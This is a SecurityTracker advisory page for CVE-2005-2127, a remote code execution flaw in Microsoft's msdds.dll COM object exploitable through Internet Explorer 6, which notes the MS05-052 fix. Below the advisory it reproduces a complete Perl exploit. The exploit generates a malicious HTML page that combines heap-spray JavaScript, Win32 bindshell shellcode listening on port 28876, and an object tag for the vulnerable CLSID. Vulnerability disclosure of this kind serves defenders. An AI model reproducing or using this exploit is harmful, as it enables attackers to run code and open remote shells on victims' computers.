SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Generic)  >   Microsoft Internet Explorer (IE) Vendors:   Microsoft
Microsoft 'msdds.dll' COM Object Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1014727
SecurityTracker URL:  http://securitytracker.com/id/1014727
CVE Reference:   CVE-2005-2127   (Links to External Site)
Updated:  Feb 21 2006
Original Entry Date:  Aug 18 2005
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 6
Description:   A vulnerability was reported in the Microsoft 'msdds.dll' ActiveX object. The flaw can be exploited via Internet Explorer. A remote user can cause arbitrary code to be executed on the target user's system.

A remote user can create specially crafted HTML that, when loaded by the target user with Internet Explorer, will trigger a vulnerability in the 'msdds.dll' COM object (CLSID: EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F). Arbitrary code can be executed with the privileges of the target user.

The affected COM Object component is the Microsoft DDS Library Shape Control used by various components such as Visual Studio Database Diagramming. The vulnerable versions of 'Msdds.dll' are 7.0.9064.9112, 7.0.9064.9143, and 7.0.9466.0. Versions 7.0.9955.0 and 7.10.3077.0 and higher versions are not affected.

Microsoft indicates that users of the initial release of Microsoft Visual Studio 2002 are affected.

Users of Microsoft Office XP SP3 are not vulnerable by default. However, if the 'Msvcr70.dll' and 'Msvscp70.dll' files are accessible to Internet Explorer process (by being in the same directory as 'Msdds.dll' or being in the path, for example), then the system is vulnerable.

'Anonymous' discovered this vulnerability.

Impact:   A remote user can cause arbitrary code to be executed on the target user's system with the privileges of the target user.
Solution:   Microsoft has issued a fix [in October 2005] as part of the MS05-052 cumulative update for Internet Explorer:

http://www.microsoft.com/technet/security/Bulletin/MS05-052.mspx

Microsoft updated their original advisory on February 21, 2006 to indicate that MS05-052 fixes the problem. The original Microsoft advisory is available at:

http://www.microsoft.com/technet/security/advisory/906267.mspx

Vendor URL:  www.microsoft.com/technet/security/Bulletin/MS05-052.mspx (Links to External Site)
Cause:   Boundary error
Underlying OS:   Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Thu, 18 Aug 2005 01:48:41 -0400
Subject:  [none]


#!/usr/bin/perl
#######################################################
# 
# Microsoft Internet Explorer "Msdds.dll" Remote Code Execution Exploit (0day)
#
# Bindshell on port 28876 - Vulnerability discovered and exploited by Anonymous
# 
# PoC code ripped from Berend-Jan Wever's Internet-Exploiter
#
# Vulnerable : EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F (Msdds.dll)
#
# Tested on : Microsoft Internet Explorer 6 SP2 (Windows XP SP2)
#
# Code usage : perl IE-Msddsdll-0day.pl > mypage.html
# 
#######################################################
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2, 1991 as published by
# the Free Software Foundation.
# 
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
# 
# A copy of the GNU General Public License can be found at:
# http://www.gnu.org/licenses/gpl.html
# or you can write to:
# Free Software Foundation, Inc.
# 59 Temple Place - Suite 330
# Boston, MA 02111-1307
# USA.
#
#######################################################

# header
my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n";

# Win32 bindshell (port 28876) - SkyLined
my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea".
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7".
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b".
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64".
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c".
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe".
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0".
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050".
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6".
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650".
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa".
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656".
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1".
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353".
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353".
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe".
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff".
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\n";

# Memory 
my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n".
"headersize = 20;\n".
"slackspace = headersize+shellcode.length\n".
"while (bigblock.length<slackspace) bigblock+=bigblock;\n".
"fillblock = bigblock.substring(0, slackspace);\n".
"block = bigblock.substring(0, bigblock.length-slackspace);\n".
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n".
"memory = new Array();\n".
"for (i=0;i<700;i++) memory[i] = block + shellcode;\n".
"</SCRIPT>\n";

# Msdds.dll
my $clsid = 'EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F'; 

# footer
my $footer = "<object classid=\"CLSID:".$clsid."\"></object></body></html>\n".
"Microsoft Internet Explorer Msdds.dll COM Object Remote Exploit\n";

# print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin
print "$header $shellcode $code $footer"; 
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC